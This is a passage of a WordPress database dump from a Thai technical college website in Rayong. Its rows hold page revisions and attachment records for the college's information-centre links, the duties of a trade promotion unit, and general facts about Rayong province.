src=\"/wp-content/uploads/2018/06/4.jpg\" alt=\"\" width=\"1135\" height=\"677\" />', 'ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต', '', 'inherit', 'closed', 'closed', '', '2947-revision-v1', '', '', '2018-06-12 13:41:14', '2018-06-12 06:41:14', '', 2947, 'http://www.technicrayong.ac.th/2947-revision-v1/', 0, 'revision', '', 0),
(2959, 3, '2018-06-12 13:43:52', '2018-06-12 06:43:52', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx\">พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf\">ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี ๒๕๕๘</a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/ขั้นตอนการเปลี่ยน-password\"><span style=\"color: #800000;\">ขั้นตอนการเปลี่ยน Password สำหรับใช้งานอินเตอร์เน็ต (ภายในวิทยาลัยฯ)</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B260/\">ข้อมูลนักเรียน นักศึกษา</a></span></h3>\r\n<h3><span style=\"color: #008000;\">ข้อมูลบุคลากร</span></h3>\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-06-12 13:43:52', '2018-06-12 06:43:52', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2960, 3, '2018-06-12 13:44:56', '2018-06-12 06:44:56', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx\">พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf\">ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี ๒๕๕๘</a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</a></h3>\r\n<h3><a href=\"/ขั้นตอนการเปลี่ยน-password\"><span style=\"color: #800000;\">ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต (ภายในวิทยาลัยฯ)</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B260/\">ข้อมูลนักเรียน นักศึกษา</a></span></h3>\r\n<h3><span style=\"color: #008000;\">ข้อมูลบุคลากร</span></h3>\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-06-12 13:44:56', '2018-06-12 06:44:56', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2961, 3, '2018-06-12 13:46:49', '2018-06-12 06:46:49', '', '2_หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์', '', 'inherit', 'closed', 'closed', '', '2_%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%81%e0%b8%93%e0%b8%91%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%81%e0%b9%87%e0%b8%9a%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%82', '', '', '2018-06-12 13:46:49', '2018-06-12 06:46:49', '', 1741, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/2_หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์.ppt', 0, 'attachment', 'application/vnd.ms-powerpoint', 0),
(2962, 3, '2018-06-12 13:47:22', '2018-06-12 06:47:22', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx\">พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf\">ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี ๒๕๕๘</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/2_หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์.ppt\">หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์</a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</a></h3>\r\n<h3><a href=\"/ขั้นตอนการเปลี่ยน-password\"><span style=\"color: #800000;\">ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต (ภายในวิทยาลัยฯ)</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B260/\">ข้อมูลนักเรียน นักศึกษา</a></span></h3>\r\n<h3><span style=\"color: #008000;\">ข้อมูลบุคลากร</span></h3>\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-06-12 13:47:22', '2018-06-12 06:47:22', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2963, 3, '2018-06-12 14:28:17', '2018-06-12 07:28:17', '', 'ข้อมูลบุคคลากร2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a32560-3', '', '', '2018-06-12 14:28:17', '2018-06-12 07:28:17', '', 1354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ข้อมูลบุคคลากร2560.pdf', 0, 'attachment', 'application/pdf', 0),
(2964, 3, '2018-06-12 14:28:58', '2018-06-12 07:28:58', '', 'ข้อมูลบุคคลากร 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3-2561', '', '', '2018-06-12 14:28:58', '2018-06-12 07:28:58', '', 1354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ข้อมูลบุคคลากร-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(2965, 3, '2018-06-12 14:38:06', '2018-06-12 07:38:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><a href=\"/wp-content/uploads/2018/06/ข้อมูลบุคคลากร-2561.pdf\">ข้อมูลบุคลากร ปี 2561</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/ข้อมูลบุคคลากร2560.pdf\">ข้อมูลบุคลากร ปี 2560</a></h3>', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-06-12 14:38:06', '2018-06-12 07:38:06', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(2971, 3, '2018-06-13 09:26:44', '2018-06-13 02:26:44', '', 'Trade_01', '', 'inherit', 'closed', 'closed', '', 'trade_01', '', '', '2018-06-13 09:26:44', '2018-06-13 02:26:44', '', 1757, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/Trade_01.png', 0, 'attachment', 'image/png', 0),
(2972, 3, '2018-06-13 09:27:35', '2018-06-13 02:27:35', '', 'Natee-karnka-1', '', 'inherit', 'closed', 'closed', '', 'natee-karnka-1', '', '', '2018-06-13 09:27:35', '2018-06-13 02:27:35', '', 1757, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/Natee-karnka-1.png', 0, 'attachment', 'image/png', 0),
(2973, 3, '2018-06-13 09:28:50', '2018-06-13 02:28:50', '<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<img class=\"alignleft wp-image-2972 size-full\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-06-13 09:28:50', '2018-06-13 02:28:50', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(2974, 3, '2018-06-13 09:29:49', '2018-06-13 02:29:49', '<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-06-13 09:29:49', '2018-06-13 02:29:49', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(2975, 3, '2018-06-13 09:45:24', '2018-06-13 02:45:24', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n 